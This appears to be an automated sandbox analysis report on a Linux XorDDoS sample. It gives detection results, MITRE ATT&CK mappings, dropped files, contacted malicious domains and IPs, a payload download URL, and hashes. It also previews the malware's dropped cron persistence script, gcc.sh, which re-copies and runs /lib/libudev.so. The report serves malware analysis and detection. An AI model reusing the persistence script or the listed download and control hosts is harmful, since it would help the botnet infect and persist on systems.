Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10043, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10054, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10065, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10087, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10098, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10109, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10131, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10142, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10153, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10175, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10186, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10197, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10219, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/zetazkptwu, type: DROPPED
Source: Yara match	File source: /usr/bin/tudlcvpgbc, type: DROPPED
Source: Yara match	File source: /usr/bin/qjfxtxsijs, type: DROPPED
Source: Yara match	File source: /lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/txflbjqefg, type: DROPPED
Source: Yara match	File source: /usr/bin/zyapsjpaje, type: DROPPED
Source: Yara match	File source: /usr/bin/wrfeamwlub, type: DROPPED
Source: Yara match	File source: /usr/bin/kmavqzvhro, type: DROPPED
Source: Yara match	File source: /usr/bin/whtzopaggc, type: DROPPED
Source: Yara match	File source: /usr/bin/wyyhrifhaz, type: DROPPED
Source: Yara match	File source: /usr/bin/wgpgdetjwe, type: DROPPED
Source: Yara match	File source: /usr/bin/yfiimchuiz, type: DROPPED
Source: Yara match	File source: /usr/bin/qvilroogsz, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	1 Systemd Service	1 Systemd Service	12 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	2 Non-Application Layer Protocol	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 At (Linux)	2 At (Linux)	2 At (Linux)	1 Scripting	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Malware Configuration

Threatname: XorDDoS

{"C2 list": []}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dkuidbsedp	100%	Avira	LINUX/Xorddos.cona
dkuidbsedp	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/lib/libudev.so	100%	Avira	LINUX/Xorddos.cona
/usr/bin/wrfeamwlub	100%	Avira	LINUX/Xorddos.cona
/usr/bin/wyyhrifhaz	100%	Avira	LINUX/Xorddos.cona
/usr/bin/txflbjqefg	100%	Avira	LINUX/Xorddos.cona
/usr/bin/zetazkptwu	100%	Avira	LINUX/Xorddos.cona
/usr/bin/wgpgdetjwe	100%	Avira	LINUX/Xorddos.cona
/usr/bin/zyapsjpaje	100%	Avira	LINUX/Xorddos.cona
/usr/bin/yfiimchuiz	100%	Avira	LINUX/Xorddos.cona
/usr/bin/whtzopaggc	100%	Avira	LINUX/Xorddos.cona
/usr/bin/qvilroogsz	100%	Avira	LINUX/Xorddos.cona
/usr/bin/kmavqzvhro	100%	Avira	LINUX/Xorddos.cona
/usr/bin/tudlcvpgbc	100%	Avira	LINUX/Xorddos.cona
/usr/bin/qjfxtxsijs	100%	Avira	LINUX/Xorddos.cona
/lib/libudev.so	100%	Joe Sandbox ML
/usr/bin/wrfeamwlub	100%	Joe Sandbox ML
/usr/bin/wyyhrifhaz	100%	Joe Sandbox ML
/usr/bin/txflbjqefg	100%	Joe Sandbox ML
/usr/bin/zetazkptwu	100%	Joe Sandbox ML
/usr/bin/wgpgdetjwe	100%	Joe Sandbox ML
/usr/bin/zyapsjpaje	100%	Joe Sandbox ML
/usr/bin/yfiimchuiz	100%	Joe Sandbox ML
/usr/bin/whtzopaggc	100%	Joe Sandbox ML
/usr/bin/qvilroogsz	100%	Joe Sandbox ML
/usr/bin/kmavqzvhro	100%	Joe Sandbox ML
/usr/bin/tudlcvpgbc	100%	Joe Sandbox ML
/usr/bin/qjfxtxsijs	100%	Joe Sandbox ML
/etc/cron.hourly/gcc.sh	0%	Metadefender		Browse
/etc/cron.hourly/gcc.sh	28%	ReversingLabs	Linux.Trojan.XorDDoS

Domains

Source	Detection	Scanner	Label	Link
www1.gggatat456.com	9%	Virustotal		Browse
ppp.xxxatat456.com	9%	Virustotal		Browse
p5.lpjulidny7.com	11%	Virustotal		Browse
p5.dddgata789.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9rl	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qj	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lh	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wr	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9pn	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wg	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wh	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jv	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ze	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yf	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zy	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9km	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wy	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tu	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gk	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tx	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qv	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www1.gggatat456.com	54.36.15.99	true	true	9%, Virustotal, Browse	unknown
ppp.xxxatat456.com	46.105.84.190	true	true	9%, Virustotal, Browse	unknown
p5.lpjulidny7.com	unknown	unknown	false	11%, Virustotal, Browse	unknown
p5.dddgata789.com	unknown	unknown	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www1.gggatat456.com/dd.rar	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9rl	dkuidbsedp, 10318.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10329.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10340.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10351.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10362.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qj	dkuidbsedp, 9931.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9942.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9953.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9964.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9975.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lh	dkuidbsedp, 10428.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10439.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wr	dkuidbsedp, 9656.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9667.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9678.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9689.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9700.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9pn	dkuidbsedp, 10373.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10384.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10395.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10406.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10417.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wg	dkuidbsedp, 9711.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9722.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9733.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9744.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9755.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wh	dkuidbsedp, 10043.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10054.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10065.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10076.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10087.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www.gnu.org/software/libc/bugs.html	dkuidbsedp, libudev.so.7.dr, wrfeamwlub.7.dr, wyyhrifhaz.7.dr, txflbjqefg.7.dr, zetazkptwu.7.dr, wgpgdetjwe.7.dr, zyapsjpaje.7.dr, yfiimchuiz.7.dr, whtzopaggc.7.dr, qvilroogsz.7.dr, kmavqzvhro.7.dr, tudlcvpgbc.7.dr, qjfxtxsijs.7.dr	false		high
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jv	dkuidbsedp, 10208.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10219.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10230.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10241.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10252.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ze	dkuidbsedp, 10153.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10164.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10175.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10186.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10197.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yf	dkuidbsedp, 9821.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9832.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9843.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9854.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9865.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zy	dkuidbsedp, 9766.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9777.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9788.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9799.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9810.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9km	dkuidbsedp, 10098.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10109.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10120.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10131.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10142.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wy	dkuidbsedp, 9601.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9612.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9623.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9634.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9644.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tu	dkuidbsedp, 9988.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9999.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10010.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10021.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10032.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gk	dkuidbsedp, 10263.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10274.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10285.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10296.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10307.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tx	dkuidbsedp, 9876.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9887.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9898.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9909.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9920.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t	dkuidbsedp, 9445.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9450.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9453.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9457.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qv	dkuidbsedp, 9546.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9557.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9568.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9579.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9590.1.00000000ff850000.00000000ff871000.rw-.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
54.36.15.99	www1.gggatat456.com	France		16276	OVHFR	true
51.89.52.12	unknown	France		16276	OVHFR	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54.36.15.99	libudev.so	Get hash	malicious	Browse	www1.gggatat456.com/dd.rar
54.36.15.99	0Xorddos.o	Get hash	malicious	Browse	www1.gggatat456.com/dd.rar
51.89.52.12	libudev.so	Get hash	malicious	Browse
51.89.52.12	0Xorddos.o	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www1.gggatat456.com	libudev.so	Get hash	malicious	Browse	54.36.15.99
	xor1.o	Get hash	malicious	Browse	54.36.15.99
	0Xorddos.o	Get hash	malicious	Browse	54.36.15.99
	http://www1.gggatat456.com/dd.rar	Get hash	malicious	Browse	51.68.183.108
	w.txt	Get hash	malicious	Browse	92.222.83.172
	w.txt	Get hash	malicious	Browse	92.222.83.172
	1433.bin	Get hash	malicious	Browse	91.134.134.116
	libudev.so	Get hash	malicious	Browse	91.134.134.116
	TPHM5fHHv1	Get hash	malicious	Browse	51.77.240.165
ppp.xxxatat456.com	libudev.so	Get hash	malicious	Browse	54.36.15.96
	0Xorddos.o	Get hash	malicious	Browse	79.137.1.132
	libudev.so	Get hash	malicious	Browse	151.80.176.165
	TPHM5fHHv1	Get hash	malicious	Browse	51.38.200.186

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	Emrar Dis Ticaret ve Lojistik Payment Advice 46,273.15USD.exe	Get hash	malicious	Browse	198.50.252.64
	https://click.snapchat.com/aVHG?pid=snapchat_download_page&af_dp=http://.ebay.com&af_web_dp=http%3A%2F%2Fonlin3.web.app%2FnZ1arkd0TwallaR3wQ3b07xR3w5kZlrQ3bitd0TR3wH05nZ1	Get hash	malicious	Browse	51.89.21.65
	7lrD6OXDEb.exe	Get hash	malicious	Browse	51.161.59.66
	Air_canada_baggage_interline_agreement (puc).js	Get hash	malicious	Browse	188.165.135.193
	EZbZDkFEQ1.exe	Get hash	malicious	Browse	51.81.194.202
	GrSqMbdG99.exe	Get hash	malicious	Browse	51.81.194.202
	Uo4DceaVMZ.exe	Get hash	malicious	Browse	51.75.209.232
	7qrNClSmv7.exe	Get hash	malicious	Browse	51.81.194.202
	Seguimiento de Fedex.exe	Get hash	malicious	Browse	158.69.242.51
	https://globalfoundries.grapesadvertising.com/clearcache/main/?e=YWxiZXJ0LnF1aWV0enNjaEBnbG9iYWxmb3VuZHJpZXMuY29t	Get hash	malicious	Browse	51.89.2.129
	home.x86_64-20220726-0916	Get hash	malicious	Browse	51.254.200.195
	VESSEL DESC-MV TBN.exe	Get hash	malicious	Browse	54.38.32.14
	vbc.exe	Get hash	malicious	Browse	51.161.59.66
	SecuriteInfo.com.IL.Trojan.MSILZilla.22184.14819.exe	Get hash	malicious	Browse	51.195.145.82
	rFRgieWgV9.exe	Get hash	malicious	Browse	158.69.65.151
	SecuriteInfo.com.W32.AIDetectNet.01.24765.exe	Get hash	malicious	Browse	91.134.184.195
	SecuriteInfo.com.Trojan.Heur.DNP.qm0@aSwg8diG.13531.exe	Get hash	malicious	Browse	91.134.184.195
	SecuriteInfo.com.Trojan.Win32.Tnega.KAU.MTB.32429.exe	Get hash	malicious	Browse	142.4.204.181
	difference_between_oral_and_verbal_agreement (hzqi).js	Get hash	malicious	Browse	188.165.135.193
	JUSTIFICANTE DE PAGO.exe	Get hash	malicious	Browse	92.222.97.132
OVHFR	Emrar Dis Ticaret ve Lojistik Payment Advice 46,273.15USD.exe	Get hash	malicious	Browse	198.50.252.64
	https://click.snapchat.com/aVHG?pid=snapchat_download_page&af_dp=http://.ebay.com&af_web_dp=http%3A%2F%2Fonlin3.web.app%2FnZ1arkd0TwallaR3wQ3b07xR3w5kZlrQ3bitd0TR3wH05nZ1	Get hash	malicious	Browse	51.89.21.65
	7lrD6OXDEb.exe	Get hash	malicious	Browse	51.161.59.66
	Air_canada_baggage_interline_agreement (puc).js	Get hash	malicious	Browse	188.165.135.193
	EZbZDkFEQ1.exe	Get hash	malicious	Browse	51.81.194.202
	GrSqMbdG99.exe	Get hash	malicious	Browse	51.81.194.202
	Uo4DceaVMZ.exe	Get hash	malicious	Browse	51.75.209.232
	7qrNClSmv7.exe	Get hash	malicious	Browse	51.81.194.202
	Seguimiento de Fedex.exe	Get hash	malicious	Browse	158.69.242.51
	https://globalfoundries.grapesadvertising.com/clearcache/main/?e=YWxiZXJ0LnF1aWV0enNjaEBnbG9iYWxmb3VuZHJpZXMuY29t	Get hash	malicious	Browse	51.89.2.129
	home.x86_64-20220726-0916	Get hash	malicious	Browse	51.254.200.195
	VESSEL DESC-MV TBN.exe	Get hash	malicious	Browse	54.38.32.14
	vbc.exe	Get hash	malicious	Browse	51.161.59.66
	SecuriteInfo.com.IL.Trojan.MSILZilla.22184.14819.exe	Get hash	malicious	Browse	51.195.145.82
	rFRgieWgV9.exe	Get hash	malicious	Browse	158.69.65.151
	SecuriteInfo.com.W32.AIDetectNet.01.24765.exe	Get hash	malicious	Browse	91.134.184.195
	SecuriteInfo.com.Trojan.Heur.DNP.qm0@aSwg8diG.13531.exe	Get hash	malicious	Browse	91.134.184.195
	SecuriteInfo.com.Trojan.Win32.Tnega.KAU.MTB.32429.exe	Get hash	malicious	Browse	142.4.204.181
	difference_between_oral_and_verbal_agreement (hzqi).js	Get hash	malicious	Browse	188.165.135.193
	JUSTIFICANTE DE PAGO.exe	Get hash	malicious	Browse	92.222.97.132

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
/etc/cron.hourly/gcc.sh	libudev.so	Get hash	malicious	Browse
	23.vir	Get hash	malicious	Browse
	23.vir	Get hash	malicious	Browse
	xor1.o	Get hash	malicious	Browse
	CCCxor.o	Get hash	malicious	Browse
	2BAFxor.o	Get hash	malicious	Browse
	task2.bin	Get hash	malicious	Browse
	task2.bin	Get hash	malicious	Browse
	task2.bin	Get hash	malicious	Browse
	0Xorddos.o	Get hash	malicious	Browse
	x.o	Get hash	malicious	Browse
	23	Get hash	malicious	Browse
	23	Get hash	malicious	Browse
	XZFWLZVF1Z	Get hash	malicious	Browse
	EgrT0zBhDa	Get hash	malicious	Browse
	4ljhdTTyiA	Get hash	malicious	Browse
	7nJAEBDitl	Get hash	malicious	Browse
	ygljglkjgfg0	Get hash	malicious	Browse
	bVexvNSHcD	Get hash	malicious	Browse
	rJabrNEtBM	Get hash	malicious	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Process:	/tmp/dkuidbsedp
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 28%
Joe Sandbox View:	Filename: libudev.so, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: xor1.o, Detection: malicious, Browse Filename: CCCxor.o, Detection: malicious, Browse Filename: 2BAFxor.o, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: 0Xorddos.o, Detection: malicious, Browse Filename: x.o, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: XZFWLZVF1Z, Detection: malicious, Browse Filename: EgrT0zBhDa, Detection: malicious, Browse Filename: 4ljhdTTyiA, Detection: malicious, Browse Filename: 7nJAEBDitl, Detection: malicious, Browse Filename: ygljglkjgfg0, Detection: malicious, Browse Filename: bVexvNSHcD, Detection: malicious, Browse Filename: rJabrNEtBM, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Process:	/bin/dash
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
